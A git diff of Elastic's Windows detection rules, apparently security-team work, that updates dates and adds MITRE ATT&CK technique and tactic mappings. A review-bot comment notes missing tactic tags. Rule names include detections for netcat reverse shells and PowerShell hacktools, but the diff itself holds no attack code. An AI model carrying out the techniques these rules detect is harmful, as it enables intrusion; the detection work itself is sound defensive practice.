"TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/windows/defense_evasion_wsl_filesystem.toml b/rules/windows/defense_evasion_wsl_filesystem.toml index 6ec6a72e996..44f6745bb9c 100644 --- a/rules/windows/defense_evasion_wsl_filesystem.toml +++ b/rules/windows/defense_evasion_wsl_filesystem.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,14 +88,31 @@ sequence by process.entity_id with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 1d34d559fbf..d8753675b61 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml +++ b/rules/windows/defense_evasion_wsl_kalilinux.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,14 +100,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml index ca02fcc756a..2e219f30e67 100644 --- a/rules/windows/defense_evasion_wsl_registry_modification.toml +++ b/rules/windows/defense_evasion_wsl_registry_modification.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,6 +90,7 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" 
@@ -100,9 +101,25 @@ id = "T1202" name = "Indirect Command Execution" reference = "https://attack.mitre.org/techniques/T1202/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/discovery_active_directory_webservice.toml b/rules/windows/discovery_active_directory_webservice.toml index 56600c5238b..9d12b1b6952 100644 --- a/rules/windows/discovery_active_directory_webservice.toml +++ b/rules/windows/discovery_active_directory_webservice.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,14 +83,33 @@ Active Directory Web Service (ADWS) facilitates querying Active Directory (AD) o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml index 03d5ecdf531..bee03e2901a 100644 --- a/rules/windows/discovery_command_system_account.toml +++ b/rules/windows/discovery_command_system_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -96,31 +96,36 @@ not (process.parent.name : "cmd.exe" and process.working_directory : "C:\\Progra [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/discovery_high_number_ad_properties.toml b/rules/windows/discovery_high_number_ad_properties.toml index ba1b6f16be2..53ce1bbbceb 100644 --- a/rules/windows/discovery_high_number_ad_properties.toml +++ b/rules/windows/discovery_high_number_ad_properties.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -85,14 +85,33 @@ any where host.os.type == "windows" and event.code == "4662" and not winlog.even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" + +[[rule.threat.technique]] +id = "T1482" +name = "Domain Trust Discovery" +reference = "https://attack.mitre.org/techniques/T1482/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/discovery_host_public_ip_address_lookup.toml b/rules/windows/discovery_host_public_ip_address_lookup.toml index 70ce393aac1..3382a113142 100644 --- a/rules/windows/discovery_host_public_ip_address_lookup.toml +++ b/rules/windows/discovery_host_public_ip_address_lookup.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -131,30 +131,35 @@ network where host.os.type == "windows" and dns.question.name != null and proces [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.004" name = "DNS" reference = "https://attack.mitre.org/techniques/T1071/004/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/windows/discovery_posh_suspicious_api_functions.toml b/rules/windows/discovery_posh_suspicious_api_functions.toml index 4fa1272e100..01b324a4b1d 100644 --- a/rules/windows/discovery_posh_suspicious_api_functions.toml +++ b/rules/windows/discovery_posh_suspicious_api_functions.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -165,76 +165,107 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" +[[rule.threat.technique]] +id = "T1201" +name = "Password Policy Discovery" +reference = "https://attack.mitre.org/techniques/T1201/" + [[rule.threat.technique]] id = "T1482" name = "Domain Trust Discovery" reference = "https://attack.mitre.org/techniques/T1482/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = 
"MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1039" name = "Data from Network Shared Drive" reference = "https://attack.mitre.org/techniques/T1039/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/discovery_whoami_command_activity.toml b/rules/windows/discovery_whoami_command_activity.toml index 0c166da5fd0..80a9d2adbd9 100644 --- a/rules/windows/discovery_whoami_command_activity.toml +++ b/rules/windows/discovery_whoami_command_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,14 +117,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1033" name = "System Owner/User Discovery" reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - 
diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml index c7deeed356b..93381464838 100644 --- a/rules/windows/execution_com_object_xwizard.toml +++ b/rules/windows/execution_com_object_xwizard.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,19 +105,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml index 764af8ffaf6..9f5a04ad732 100644 --- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml +++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -134,29 +134,39 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml index 6424adbe5c9..46e6569f805 100644 --- a/rules/windows/execution_command_shell_started_by_svchost.toml +++ b/rules/windows/execution_command_shell_started_by_svchost.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/29" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -132,17 +132,26 @@ not process.args:(".\inetsrv\iissetup.exe /keygen " or "C:\Program" or "C:\Progr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml index c728a7ba058..edc62287465 100644 --- a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml +++ b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -103,28 +103,50 @@ sequence by process.parent.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + [[rule.threat.technique]] id = "T1216" name = "System Script Proxy Execution" @@ -134,6 +156,7 @@ reference = "https://attack.mitre.org/techniques/T1216/" id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.003" name = "CMSTP" @@ -164,7 +187,6 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" 
@@ -174,15 +196,13 @@ reference = "https://attack.mitre.org/techniques/T1220/" id = "T1497" name = "Virtualization/Sandbox Evasion" reference = "https://attack.mitre.org/techniques/T1497/" + [[rule.threat.technique.subtechnique]] id = "T1497.003" name = "Time Based Checks" reference = "https://attack.mitre.org/techniques/T1497/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml index 1e01769894a..27e5073ecae 100644 --- a/rules/windows/execution_downloaded_url_file.toml +++ b/rules/windows/execution_downloaded_url_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/06/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,22 +72,30 @@ URL shortcut files, typically used for quick access to web resources, can be exp [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -98,10 +106,7 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - 
diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml
index 15f89225424..5b7c76345e6 100644
--- a/rules/windows/execution_enumeration_via_wmiprvse.toml
+++ b/rules/windows/execution_enumeration_via_wmiprvse.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/19"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -99,38 +99,65 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1007" +name = "System Service Discovery" +reference = "https://attack.mitre.org/techniques/T1007/" + +[[rule.threat.technique]] +id = "T1012" +name = "Query Registry" +reference = "https://attack.mitre.org/techniques/T1012/" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique.subtechnique]] id = "T1016.001" name = "Internet Connection Discovery" reference = "https://attack.mitre.org/techniques/T1016/001/" - [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" 
@@ -141,9 +168,12 @@ id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" +[[rule.threat.technique]] +id = "T1615" +name = "Group Policy Discovery" +reference = "https://attack.mitre.org/techniques/T1615/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml index 2b11f8ec924..51e7dee4439 100644 --- a/rules/windows/execution_from_unusual_path_cmdline.toml +++ b/rules/windows/execution_from_unusual_path_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -236,36 +236,76 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = 
"https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml index 62b894c0d72..98d60148ce0 100644 --- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -140,36 +140,49 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/execution_initial_access_foxmail_exploit.toml b/rules/windows/execution_initial_access_foxmail_exploit.toml index 1724e0f677c..084cd4eff65 100644 --- a/rules/windows/execution_initial_access_foxmail_exploit.toml +++ b/rules/windows/execution_initial_access_foxmail_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
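Review bot: The new TA0011 `[[rule.threat]]` entry in execution_html_help_executable_program_connecting_to_the_internet.toml has no matching change to the rule's `tags` array in any hunk in view, so unless that edit sits outside this excerpt the rule will lack a `Tactic: Command and Control` tag while its threat mapping claims that tactic. The repository's convention is one `Tactic: <name>` tag per tactic listed under `rule.threat`, and a `[rule]`-level `tags` hunk would normally accompany a tactic addition. The same applies to every other rule in this view that gains a tactic: execution_initial_access_via_msc_file.toml, execution_initial_access_wps_dll_exploit.toml, execution_nodejs_susp_patterns.toml, execution_powershell_susp_args_via_winscript.toml, execution_shared_modules_local_sxs_dll.toml and execution_susp_javascript_via_deno.toml (Defense Evasion), execution_revshell_cmd_via_netcat.toml, execution_scripting_remote_webdav.toml and execution_susp_javascript_via_deno.toml (Command and Control), execution_scheduled_task_powershell_source.toml (Lateral Movement), and execution_posh_hacktool_functions.toml (Credential Access, Defense Evasion, Discovery, Exfiltration, Persistence). The expected addition for this hunk is a single line in the `tags` list, `"Tactic: Command and Control",`.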
